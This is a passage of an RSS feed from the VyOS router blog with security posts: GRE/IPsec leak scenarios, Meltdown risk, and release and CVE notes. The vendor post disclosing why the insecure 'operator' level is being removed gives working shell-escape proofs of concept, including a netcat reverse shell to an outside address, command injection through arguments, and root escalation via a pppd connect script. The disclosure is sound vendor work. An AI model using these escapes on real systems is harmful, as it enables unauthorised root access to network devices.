&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fcve-2019-11477-tcp-sack-panic-and-an-intel-i40e-driver-issue&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>kernel</category>
      <category>1.2</category>
      <pubDate>Tue, 18 Jun 2019 20:18:24 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/cve-2019-11477-tcp-sack-panic-and-an-intel-i40e-driver-issue</guid>
      <dc:date>2019-06-18T20:18:24Z</dc:date>
    </item>
    <item>
      <title>The "operator" level is proved insecure and will be removed in the next releases</title>
      <link>https://blog.vyos.io/the-operator-level-is-proved-insecure-and-will-be-removed-in-the-next-releases</link>
      <description>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;The operator level in VyOS is a legacy feature that was inherited from the forked Vyatta Core code. It was always relatively obscure, and I don't think anyone really trusted its security, and for good reasons: with our current CLI architecture, real privilege separation is&amp;nbsp; impossible.&lt;br&gt;&lt;/p&gt; 
 &lt;p&gt;Security researcher Rich Mirch found multiple ways to escape the restricted shell and execute commands with root permissions for the operator level users. Most of those would take a lot of effort to fix, and it's not clear if some of those can be fixed at all. Since any new implementation of a privilege separation system will be incompatible with the old one, and leaving operator level in the system is best described as "security theater", in the next releases that feature will be removed and operator level users will be converted to admin level users.&lt;br&gt;&lt;/p&gt; 
 &lt;p&gt;We will use the "id" UNIX command for demonstration since it's harmless but is not supposed to be available for operator level users. Here are proofs of concept for all vulnerabilities reported by Rich:&lt;br&gt;&lt;/p&gt; 
 &lt;h3&gt;Restricted shell escape using the telnet command&lt;/h3&gt; 
 &lt;div&gt;
   Proof of concept: 
  &lt;br&gt; 
 &lt;/div&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; telnet "127.0.0.1;bash"&lt;br&gt;
telnet: can't connect to remote host (127.0.0.1): Connection refused&lt;br&gt;
# we are now in real, unrestricted bash
&lt;p&gt;user1@vyos&amp;gt; id&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),...
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;This problem could potentially be fixed, but since there's no way to introduce global input sanitation, every command would have to be checked and protected individually.&lt;/p&gt; 
 &lt;h3&gt;Restricted shell escape using the "monitor command" command&lt;/h3&gt; 
 &lt;p&gt;The "monitor command" command allows operator level users to execute any command. Using it in combination with netcat it's possible to launch an unrestricted bash shell:&lt;/p&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; monitor command "$(netcat -e /bin/bash 192.168.x.x 9003)"
&lt;p&gt;Connection from 192.168.x.x:59952&lt;br&gt;
id&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)&lt;br&gt;
hostname&lt;br&gt;
vyos
&lt;/p&gt;&lt;/pre&gt; 
 &lt;h3&gt;Restricted shell escape using the traffic dump filters&lt;/h3&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; monitor interfaces ethernet eth0 traffic detail unlimited filter "-w /dev/null 2&amp;gt;/dev/null &amp;amp; bash"&lt;br&gt;
Capturing traffic on eth0 ...
&lt;p&gt;id&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)
&lt;/p&gt;&lt;/pre&gt; 
 &lt;h3&gt;Restricted shell escape using backtick evaluation as a set command argument&lt;/h3&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; set "`/bin/bash`"
&lt;p&gt;user1@vyos&amp;gt; id &amp;gt;/dev/tty&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;This one is special because there may not be a way to fix it at all.&lt;/p&gt; 
 &lt;h3&gt;Local privilege escalarion using pppd connection scripts&lt;br&gt;&lt;br&gt; &lt;/h3&gt; 
 &lt;p&gt;Operator level users are allowed to call pppd for the connect/disconnect commands. Since pppd is executed with root permissions, a malicious operator can execute arbitrary commands as root using a custom PPP connection script.&lt;/p&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; echo "id &amp;gt;/dev/tty" &amp;gt; id.sh&lt;br&gt;
user1@vyos&amp;gt; chmod 755 id.sh
&lt;p&gt;Execute the id command as root using the sudo /sbin/pppd command.&lt;/p&gt;
&lt;p&gt;user1@vyos&amp;gt; sudo /sbin/pppd connect $PWD/id.sh&lt;br&gt;
uid=0(root) gid=0(root) groups=0(root)
&lt;/p&gt;&lt;/pre&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;The operator level in VyOS is a legacy feature that was inherited from the forked Vyatta Core code. It was always relatively obscure, and I don't think anyone really trusted its security, and for good reasons: with our current CLI architecture, real privilege separation is&amp;nbsp; impossible.&lt;br&gt;&lt;/p&gt; 
 &lt;p&gt;Security researcher Rich Mirch found multiple ways to escape the restricted shell and execute commands with root permissions for the operator level users. Most of those would take a lot of effort to fix, and it's not clear if some of those can be fixed at all. Since any new implementation of a privilege separation system will be incompatible with the old one, and leaving operator level in the system is best described as "security theater", in the next releases that feature will be removed and operator level users will be converted to admin level users.&lt;br&gt;&lt;/p&gt; 
 &lt;p&gt;We will use the "id" UNIX command for demonstration since it's harmless but is not supposed to be available for operator level users. Here are proofs of concept for all vulnerabilities reported by Rich:&lt;br&gt;&lt;/p&gt; 
 &lt;h3&gt;Restricted shell escape using the telnet command&lt;/h3&gt; 
 &lt;div&gt;
   Proof of concept: 
  &lt;br&gt; 
 &lt;/div&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; telnet "127.0.0.1;bash"&lt;br&gt;
telnet: can't connect to remote host (127.0.0.1): Connection refused&lt;br&gt;
# we are now in real, unrestricted bash
&lt;p&gt;user1@vyos&amp;gt; id&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),...
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;This problem could potentially be fixed, but since there's no way to introduce global input sanitation, every command would have to be checked and protected individually.&lt;/p&gt; 
 &lt;h3&gt;Restricted shell escape using the "monitor command" command&lt;/h3&gt; 
 &lt;p&gt;The "monitor command" command allows operator level users to execute any command. Using it in combination with netcat it's possible to launch an unrestricted bash shell:&lt;/p&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; monitor command "$(netcat -e /bin/bash 192.168.x.x 9003)"
&lt;p&gt;Connection from 192.168.x.x:59952&lt;br&gt;
id&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)&lt;br&gt;
hostname&lt;br&gt;
vyos
&lt;/p&gt;&lt;/pre&gt; 
 &lt;h3&gt;Restricted shell escape using the traffic dump filters&lt;/h3&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; monitor interfaces ethernet eth0 traffic detail unlimited filter "-w /dev/null 2&amp;gt;/dev/null &amp;amp; bash"&lt;br&gt;
Capturing traffic on eth0 ...
&lt;p&gt;id&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)
&lt;/p&gt;&lt;/pre&gt; 
 &lt;h3&gt;Restricted shell escape using backtick evaluation as a set command argument&lt;/h3&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; set "`/bin/bash`"
&lt;p&gt;user1@vyos&amp;gt; id &amp;gt;/dev/tty&lt;br&gt;
uid=1001(user1) gid=100(users) groups=100(users),4(adm),30(dip),37(operator),102(quaggavty),105(vyattaop)
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;This one is special because there may not be a way to fix it at all.&lt;/p&gt; 
 &lt;h3&gt;Local privilege escalarion using pppd connection scripts&lt;br&gt;&lt;br&gt; &lt;/h3&gt; 
 &lt;p&gt;Operator level users are allowed to call pppd for the connect/disconnect commands. Since pppd is executed with root permissions, a malicious operator can execute arbitrary commands as root using a custom PPP connection script.&lt;/p&gt; 
 &lt;pre&gt;user1@vyos&amp;gt; echo "id &amp;gt;/dev/tty" &amp;gt; id.sh&lt;br&gt;
user1@vyos&amp;gt; chmod 755 id.sh
&lt;p&gt;Execute the id command as root using the sudo /sbin/pppd command.&lt;/p&gt;
&lt;p&gt;user1@vyos&amp;gt; sudo /sbin/pppd connect $PWD/id.sh&lt;br&gt;
uid=0(root) gid=0(root) groups=0(root)
&lt;/p&gt;&lt;/pre&gt; 
&lt;/div&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fthe-operator-level-is-proved-insecure-and-will-be-removed-in-the-next-releases&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Thu, 01 Nov 2018 19:37:42 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/the-operator-level-is-proved-insecure-and-will-be-removed-in-the-next-releases</guid>
      <dc:date>2018-11-01T19:37:42Z</dc:date>
    </item>
    <item>
      <title>On security of GRE/IPsec scenarios</title>
      <link>https://blog.vyos.io/on-security-of-gre/ipsec-scenarios</link>
      <description>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;As we've already discussed, there are many ways to setup GRE (or something else) over IPsec and they all have their advantages and disadvantages. Recently an issue was brought to my attention: which ones are safe against unencrypted GRE traffic being sent?&lt;/p&gt; 
 &lt;p&gt;The reason this issue can appear at all is that GRE and IPsec are related to each other more like routing and NAT: in some setups their configuration has to be carefully coordinated, but in general they can easily be used without each other. Lack of tight coupling between features allows greater flexibility, but it may also create situations when the setup stops working as intended without a clear indication as to why it happened.&lt;/p&gt; 
 &lt;p&gt;Let's review the knowingly safe scenarios:&lt;/p&gt; 
 &lt;h3&gt;VTI&lt;/h3&gt; 
 &lt;p&gt;This one is least flexible, but also foolproof by design: the VTI interface (which is secretly simply IPIP) is brought up only when an IPsec tunnel associated with it is up, and goes down when the tunnel goes down. No traffic will ever be sent over a VTI interface until IKE succeeds.&lt;/p&gt; 
 &lt;h3&gt;Tunnel sourced from a loopback address&lt;/h3&gt; 
 &lt;p&gt;If you have missed it, the basic idea of this setup is the following:&lt;/p&gt; 
 &lt;pre&gt;set interfaces dummy dum0 address 192.168.1.100/32
&lt;p&gt;set interfaces tunnel tun0 local-ip 192.168.1.100/32&lt;br&gt;
set interfaces tunnel tun0 remote-ip 192.168.1.101/32 # assigned to dum0 on the remote side&lt;/p&gt;
&lt;p&gt;set vpn ipsec site-to-site peer 203.0.113.50 tunnel 1 local prefix 192.168.1.100/32&lt;br&gt;
set vpn ipsec site-to-site peer 203.0.113.50 tunnel 1 remote prefix 192.168.1.101/32
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;Most often it's used when the routers are behind NAT, or one side lacks a static address, which makes selecting traffic for encryptions by protocol alone impossible. However, it also introduces tight coupling between IPsec and GRE: since the remote end of the GRE tunnel can only be reached via an IPsec tunnel, no communication between the routers over GRE is possible unless the IPsec tunnel is up. If you fear that any packets may be sent via the default route, you can nullroute the IPsec tunnel network to be sure.&lt;/p&gt; 
 &lt;h3&gt;The complicated case&lt;/h3&gt; 
 &lt;p&gt;Now let's examine the simplest kind of setup:&lt;/p&gt; 
 &lt;pre&gt;set interfaces tunnel tun0 local-ip 192.0.2.100 # WAN address&lt;br&gt;
set interfaces tunnel tun0 remote-ip 203.0.113.200
&lt;p&gt;set vpn ipsec site-to-site peer 203.0.113.200 tunnel 1 protocol gre
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;In this case IPsec is setup to encrypt the GRE traffic to 203.0.113.200, but the GRE tunnel itself can work without IPsec. In fact, it &lt;b&gt;﻿will &lt;/b&gt;﻿work without IPsec, just without encryption, and that is the concern for some people. If the IPsec tunnel goes down due to misconfiguration, it will fall back to the common, unencrypted GRE.&lt;/p&gt; 
 &lt;h3&gt;What can you do about it?&lt;/h3&gt; 
 &lt;p&gt;As a user, if your requirement is to prevent unencrypted traffic from ever being sent, you should use VTI or use loopback addresses for tunnel endpoints.&lt;/p&gt; 
 &lt;p&gt;For developers this question is more complicated.&lt;/p&gt; 
 &lt;h3&gt;What should be done about it?&lt;/h3&gt; 
 &lt;p&gt;The opinions are divided. I'll summarize the arguments here.&lt;/p&gt; 
 &lt;p&gt;Arguments for fixing it:&lt;/p&gt; 
 &lt;ul&gt; 
  &lt;li&gt;Cisco does it that way (attempts to detect that GRE and IPsec are related — at least in some implementations and at least when it's referenced as IPsec profile in the GRE tunnel)&lt;/li&gt; 
  &lt;li&gt;The current behaviour is against user's intentions&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;p&gt;Arguments against fixing it:&lt;/p&gt; 
 &lt;ul&gt; 
  &lt;li&gt;Attempts to guess user's intentions are doomed to fail at least some of the time (for example, what if a user intentionally brings an IPsec tunnel down to isolate GRE setup issues?)&lt;/li&gt; 
  &lt;li&gt;The only way to guarantee that unencrypted traffic is never sent is checking for a live SA matching protocol and source before forwarding every packet — that's not good for performance).&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;p&gt;Practical considerations:&lt;/p&gt; 
 &lt;ul&gt; 
  &lt;li&gt;Since IKE is in the userspace, the kernel can't even know that an SA is supposed to exist until IKE succeeds: automatic detection would be a big change that is unlikely to be accepted in the mainline kernel.&lt;/li&gt; 
  &lt;li&gt;Configuration changes required to avoid the issue are simple&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;div&gt;
   If you have any thoughts on the issue, please share with us! 
  &lt;br&gt; 
 &lt;/div&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;As we've already discussed, there are many ways to setup GRE (or something else) over IPsec and they all have their advantages and disadvantages. Recently an issue was brought to my attention: which ones are safe against unencrypted GRE traffic being sent?&lt;/p&gt; 
 &lt;p&gt;The reason this issue can appear at all is that GRE and IPsec are related to each other more like routing and NAT: in some setups their configuration has to be carefully coordinated, but in general they can easily be used without each other. Lack of tight coupling between features allows greater flexibility, but it may also create situations when the setup stops working as intended without a clear indication as to why it happened.&lt;/p&gt; 
 &lt;p&gt;Let's review the knowingly safe scenarios:&lt;/p&gt; 
 &lt;h3&gt;VTI&lt;/h3&gt; 
 &lt;p&gt;This one is least flexible, but also foolproof by design: the VTI interface (which is secretly simply IPIP) is brought up only when an IPsec tunnel associated with it is up, and goes down when the tunnel goes down. No traffic will ever be sent over a VTI interface until IKE succeeds.&lt;/p&gt; 
 &lt;h3&gt;Tunnel sourced from a loopback address&lt;/h3&gt; 
 &lt;p&gt;If you have missed it, the basic idea of this setup is the following:&lt;/p&gt; 
 &lt;pre&gt;set interfaces dummy dum0 address 192.168.1.100/32
&lt;p&gt;set interfaces tunnel tun0 local-ip 192.168.1.100/32&lt;br&gt;
set interfaces tunnel tun0 remote-ip 192.168.1.101/32 # assigned to dum0 on the remote side&lt;/p&gt;
&lt;p&gt;set vpn ipsec site-to-site peer 203.0.113.50 tunnel 1 local prefix 192.168.1.100/32&lt;br&gt;
set vpn ipsec site-to-site peer 203.0.113.50 tunnel 1 remote prefix 192.168.1.101/32
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;Most often it's used when the routers are behind NAT, or one side lacks a static address, which makes selecting traffic for encryptions by protocol alone impossible. However, it also introduces tight coupling between IPsec and GRE: since the remote end of the GRE tunnel can only be reached via an IPsec tunnel, no communication between the routers over GRE is possible unless the IPsec tunnel is up. If you fear that any packets may be sent via the default route, you can nullroute the IPsec tunnel network to be sure.&lt;/p&gt; 
 &lt;h3&gt;The complicated case&lt;/h3&gt; 
 &lt;p&gt;Now let's examine the simplest kind of setup:&lt;/p&gt; 
 &lt;pre&gt;set interfaces tunnel tun0 local-ip 192.0.2.100 # WAN address&lt;br&gt;
set interfaces tunnel tun0 remote-ip 203.0.113.200
&lt;p&gt;set vpn ipsec site-to-site peer 203.0.113.200 tunnel 1 protocol gre
&lt;/p&gt;&lt;/pre&gt; 
 &lt;p&gt;In this case IPsec is setup to encrypt the GRE traffic to 203.0.113.200, but the GRE tunnel itself can work without IPsec. In fact, it &lt;b&gt;﻿will &lt;/b&gt;﻿work without IPsec, just without encryption, and that is the concern for some people. If the IPsec tunnel goes down due to misconfiguration, it will fall back to the common, unencrypted GRE.&lt;/p&gt; 
 &lt;h3&gt;What can you do about it?&lt;/h3&gt; 
 &lt;p&gt;As a user, if your requirement is to prevent unencrypted traffic from ever being sent, you should use VTI or use loopback addresses for tunnel endpoints.&lt;/p&gt; 
 &lt;p&gt;For developers this question is more complicated.&lt;/p&gt; 
 &lt;h3&gt;What should be done about it?&lt;/h3&gt; 
 &lt;p&gt;The opinions are divided. I'll summarize the arguments here.&lt;/p&gt; 
 &lt;p&gt;Arguments for fixing it:&lt;/p&gt; 
 &lt;ul&gt; 
  &lt;li&gt;Cisco does it that way (attempts to detect that GRE and IPsec are related — at least in some implementations and at least when it's referenced as IPsec profile in the GRE tunnel)&lt;/li&gt; 
  &lt;li&gt;The current behaviour is against user's intentions&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;p&gt;Arguments against fixing it:&lt;/p&gt; 
 &lt;ul&gt; 
  &lt;li&gt;Attempts to guess user's intentions are doomed to fail at least some of the time (for example, what if a user intentionally brings an IPsec tunnel down to isolate GRE setup issues?)&lt;/li&gt; 
  &lt;li&gt;The only way to guarantee that unencrypted traffic is never sent is checking for a live SA matching protocol and source before forwarding every packet — that's not good for performance).&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;p&gt;Practical considerations:&lt;/p&gt; 
 &lt;ul&gt; 
  &lt;li&gt;Since IKE is in the userspace, the kernel can't even know that an SA is supposed to exist until IKE succeeds: automatic detection would be a big change that is unlikely to be accepted in the mainline kernel.&lt;/li&gt; 
  &lt;li&gt;Configuration changes required to avoid the issue are simple&lt;/li&gt; 
 &lt;/ul&gt; 
 &lt;div&gt;
   If you have any thoughts on the issue, please share with us! 
  &lt;br&gt; 
 &lt;/div&gt; 
&lt;/div&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fon-security-of-gre%2Fipsec-scenarios&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>gre</category>
      <category>ipsec</category>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Fri, 27 Apr 2018 13:33:11 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/on-security-of-gre/ipsec-scenarios</guid>
      <dc:date>2018-04-27T13:33:11Z</dc:date>
    </item>
    <item>
      <title>The meltdown and spectre vulnerabilities</title>
      <link>https://blog.vyos.io/the-meltdown-and-spectre-vulnerabilities</link>
      <description>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;Everyone is talking about the meltdown and the spectre vulnerabilities now. If you are late to the party, read &lt;a href="https://meltdownattack.com/"&gt;https://meltdownattack.com/&lt;/a&gt;&amp;nbsp;&lt;/p&gt; 
 &lt;p&gt;Of course we are aware of it and took time to assess the risks for VyOS. Since both vulnerabilities can only be exploited locally, the risk for a typical VyOS installation is very low: if an untrusted person managed to login to your router, you are already deep in trouble and unathorized access to the OS memory is arguably the least of your concerns since even operator level users can make traffic dumps.&lt;/p&gt; 
 &lt;p&gt;The fix will not be included in 1.1.9. Since the fix is associated with an up to 30% performance penalty, in 1.2.x, we will make it optional is feasible.&lt;br&gt;&lt;/p&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;Everyone is talking about the meltdown and the spectre vulnerabilities now. If you are late to the party, read &lt;a href="https://meltdownattack.com/"&gt;https://meltdownattack.com/&lt;/a&gt;&amp;nbsp;&lt;/p&gt; 
 &lt;p&gt;Of course we are aware of it and took time to assess the risks for VyOS. Since both vulnerabilities can only be exploited locally, the risk for a typical VyOS installation is very low: if an untrusted person managed to login to your router, you are already deep in trouble and unathorized access to the OS memory is arguably the least of your concerns since even operator level users can make traffic dumps.&lt;/p&gt; 
 &lt;p&gt;The fix will not be included in 1.1.9. Since the fix is associated with an up to 30% performance penalty, in 1.2.x, we will make it optional is feasible.&lt;br&gt;&lt;/p&gt; 
&lt;/div&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fthe-meltdown-and-spectre-vulnerabilities&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Thu, 04 Jan 2018 22:39:27 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/the-meltdown-and-spectre-vulnerabilities</guid>
      <dc:date>2018-01-04T22:39:27Z</dc:date>
    </item>
    <item>
      <title>Update on the AWS SSH key fetching issue</title>
      <link>https://blog.vyos.io/update-on-the-aws-ssh-key-fetching-issue</link>
      <description>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;We have fixed the issue with key fetching and submitted the updated AMI for review. It passed the automated scan, but manual review and deployment to the marketplace will take some time.&lt;/p&gt; 
 &lt;p&gt;The new AMI also includes updates for dnsmasq security vulnerabilities that will be included in 1.1.8. If you want to install those updates on 1.1.7 by hand, you can use these packages: http://dev.packages.vyos.net/tmp/dnsmasq/&lt;br&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;br&gt;&lt;/p&gt; 
&lt;/div&gt;</description>
      <content:encoded>&lt;div class="posthaven-post-body"&gt; 
 &lt;p&gt;We have fixed the issue with key fetching and submitted the updated AMI for review. It passed the automated scan, but manual review and deployment to the marketplace will take some time.&lt;/p&gt; 
 &lt;p&gt;The new AMI also includes updates for dnsmasq security vulnerabilities that will be included in 1.1.8. If you want to install those updates on 1.1.7 by hand, you can use these packages: http://dev.packages.vyos.net/tmp/dnsmasq/&lt;br&gt;&lt;/p&gt; 
 &lt;p&gt;&lt;br&gt;&lt;/p&gt; 
&lt;/div&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Fupdate-on-the-aws-ssh-key-fetching-issue&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>aws</category>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Sun, 22 Oct 2017 05:48:29 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/update-on-the-aws-ssh-key-fetching-issue</guid>
      <dc:date>2017-10-22T05:48:29Z</dc:date>
    </item>
    <item>
      <title>1.1.7 maintenance release</title>
      <link>https://blog.vyos.io/index.php/2016/02/17/117-maintenance-release</link>
      <description>&lt;p&gt;1.1.7 maintenance release is available for download: &lt;a href="http://packages.vyos.net/iso/release/1.1.7/"&gt;http://packages.vyos.net/iso/release/1.1.7/&lt;/a&gt; (mirrors are syncing up).&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;1.1.7 maintenance release is available for download: &lt;a href="http://packages.vyos.net/iso/release/1.1.7/"&gt;http://packages.vyos.net/iso/release/1.1.7/&lt;/a&gt; (mirrors are syncing up).&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2016%2F02%2F17%2F117-maintenance-release&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Wed, 17 Feb 2016 14:45:01 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2016/02/17/117-maintenance-release</guid>
      <dc:date>2016-02-17T14:45:01Z</dc:date>
    </item>
    <item>
      <title>CVE-2015-7547</title>
      <link>https://blog.vyos.io/index.php/2016/02/16/cve-2015-7547</link>
      <description>&lt;p&gt;We know you are concerned (or should be concerned) with the vulnerability in glibc’s getaddrinfo() that allows remote code execution via specially crafted DNS response.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;We know you are concerned (or should be concerned) with the vulnerability in glibc’s getaddrinfo() that allows remote code execution via specially crafted DNS response.&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2016%2F02%2F16%2Fcve-2015-7547&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Tue, 16 Feb 2016 22:44:51 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2016/02/16/cve-2015-7547</guid>
      <dc:date>2016-02-16T22:44:51Z</dc:date>
    </item>
    <item>
      <title>DSA-3446-1 (SSH vulnerability)</title>
      <link>https://blog.vyos.io/index.php/2016/01/19/dsa-3446-1-ssh-vulnerability</link>
      <description>&lt;p&gt;This is a late update, and I’m definitely sorry for being late, but I promised to write it so I have to!&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;This is a late update, and I’m definitely sorry for being late, but I promised to write it so I have to!&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2016%2F01%2F19%2Fdsa-3446-1-ssh-vulnerability&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>security</category>
      <category>Uncategorized</category>
      <pubDate>Tue, 19 Jan 2016 02:54:53 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
      <guid>https://blog.vyos.io/index.php/2016/01/19/dsa-3446-1-ssh-vulnerability</guid>
      <dc:date>2016-01-19T02:54:53Z</dc:date>
    </item>
    <item>
      <title>CVE-2015-5366, 1.1.6 maintenance release, and the new public key</title>
      <link>https://blog.vyos.io/index.php/2015/08/17/cve-2015-5366-116-maintenance-release-and-the</link>
      <description>&lt;p&gt;1.1.6 maintenance release is &lt;a href="http://packages.vyos.net/iso/release/1.1.6/"&gt;available for download&lt;/a&gt; from the primary server (mirrors are still syncing up).&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;1.1.6 maintenance release is &lt;a href="http://packages.vyos.net/iso/release/1.1.6/"&gt;available for download&lt;/a&gt; from the primary server (mirrors are still syncing up).&lt;/p&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=4129050&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fblog.vyos.io%2Findex.php%2F2015%2F08%2F17%2Fcve-2015-5366-116-maintenance-release-and-the&amp;amp;bu=https%253A%252F%252Fblog.vyos.io&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>release</category>
      <category>security</category>
      <category>Uncategorized</category>
      <category>announcement</category>
      <pubDate>Mon, 17 Aug 2015 15:37:30 GMT</pubDate>
      <author>daniil@sentrium.io (Daniil Baturin)</author>
